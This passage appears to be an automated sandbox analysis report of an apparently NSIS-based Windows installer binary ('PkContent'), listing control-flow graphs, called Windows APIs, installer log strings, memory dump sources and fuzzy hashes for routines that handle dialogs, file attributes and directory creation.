40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                • String ID:
                                                • API String ID: 310444273-0
                                                • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                APIs
                                                • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                • FindClose.KERNEL32(00000000), ref: 004062EC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                • ShowWindow.USER32(?), ref: 004054D2
                                                • DestroyWindow.USER32 ref: 004054E6
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                • GetDlgItem.USER32(?,?), ref: 00405523
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                • EnableWindow.USER32(?,?), ref: 00405757
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                • EnableMenuItem.USER32(00000000), ref: 00405774
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID: @rD
                                                • API String ID: 3282139019-3814967855
                                                • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                APIs
                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                • ShowWindow.USER32(?), ref: 00401753
                                                • ShowWindow.USER32(?), ref: 00401767
                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                Strings
                                                • SetFileAttributes failed., xrefs: 004017A1
                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                • Sleep(%d), xrefs: 0040169D
                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                • BringToFront, xrefs: 004016BD
                                                • Aborting: "%s", xrefs: 0040161D
                                                • detailprint: %s, xrefs: 00401679
                                                • Rename failed: %s, xrefs: 0040194B
                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                • Jump: %d, xrefs: 00401602
                                                • Rename: %s, xrefs: 004018F8
                                                • Rename on reboot: %s, xrefs: 00401943
                                                • Call: %d, xrefs: 0040165A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                • API String ID: 2872004960-3619442763
                                                • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                APIs
                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                  • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
